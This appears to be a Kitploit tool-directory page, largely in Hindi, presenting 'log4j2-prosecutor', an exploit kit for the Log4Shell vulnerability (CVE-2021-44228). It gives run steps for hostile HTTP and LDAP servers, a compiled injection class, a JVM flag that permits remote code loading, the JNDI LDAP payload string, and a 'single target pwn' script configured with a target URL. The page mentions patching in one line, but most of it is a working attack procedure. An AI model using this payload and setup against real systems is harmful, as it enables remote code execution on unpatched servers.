Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j2-prosecutor — CVE-2021-44228 | Kitploit
उपकरण/GitHubGitHub/rodfer0x80/log4j2-prosecutor
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubrodfer0x80/log4j2-prosecutor

log4j2-prosecutor

CVE-2021-44228

रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

log4j2-prosecutor

प्रेरणा

यह मूलभूत कमजोरी [CVE-2018-3149](https://nvd.nist.gov/vuln/detail/CVE-2018-3149) द्वारा रिपोर्ट की गई थी और [इस लेख (8u121 Release Notes)](https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) द्वारा पैच की गई थी।

हालाँकि, log4j2 नामक जावा की लॉगिंग लाइब्रेरी में (JNDILookup)[CVE-2021-44228](https://github.com/apache/logging-log4j2/blob/20f9a97dbe5928c3b5077bcdd2a22ac92e941655/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/JndiLookup.java) था, जो LDAP जैसे प्रोटोकॉल तक पहुँच की अनुमति देता था, जिसने पुराने जावा संस्करणों में कोड इंजेक्शन की अनुमति दी।

जावा के पैच किए गए संस्करण कोड इंजेक्शन को रोक सकते हैं, लेकिन `JNDILookup` ldap सर्वर पर अनुरोध करता है, जिससे IP लीक हो सकता है।

समाधान **Java** और **log4j2** संस्करणों को अपडेट करना है।

चलाना

  1. आवश्यकताएँ स्थापित करें
root@kitploit:~
cd http-server && npm install && cd ../ldap-server && npm install
  1. http-server और ldap-server दोनों चलाएँ
root@kitploit:~
cd http-server && node index.js &
cd ldap-server && node index.js
  1. Main.java संकलित करें
root@kitploit:~
# This will generate Main.java - required to code injection .
# OSx
./java-single-compile <Main.java>
# Linux 
javac <Main.java>
  1. JVM को पैरामीटर के साथ प्रारंभ करें
root@kitploit:~
# You can still use log4j-client in repo for internal testing.
cd log4j-client &&\
		gradle jar &&\
		java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar build/libs/log4j-client-1.0-SNAPSHOT.jar
# Or run other application, com.sun.jndi.ldap.object.trustURLCodebase=true required for code injection, otherwise it will only request to ldap server.
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar <javafile.jar>
  1. पेलोड को किसी भी पैरामीटर पर पेलोड के रूप में भेजें (In Minecraft, बस चैट करने से यह काम करेगा यदि एक्सप्लॉइट काम कर रहा है।)
root@kitploit:~
${jndi:ldap://127.0.0.1:3001/}
  1. सफाई
root@kitploit:~
NODEP=`pgrep node`
for id in $NODEP; do
    kill $id
done

स्क्रिप्ट्स

root@kitploit:~
# Single target pwn
# Edit exploit-configs.txt with url and params
cd scripts/single-pwn && python3 __main__.py

संदर्भ

  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.lunasec.io/docs/blog/log4j-zero-day/
  • https://github.com/NCSC-NL/log4shell
  • https://github.com/ilsubyeega/log4j2-exploits/
  • https://raw.githubusercontent.com/ferderplays/Log4j_exploit/main/Exploit.java
  • https://www.blumira.com/analysis-log4shell-local-trigger/ (करना है)

लाइसेंस [GPL3]

लाइसेंस फ़ाइल LICENSE में देखें

टूल डाउनलोड करें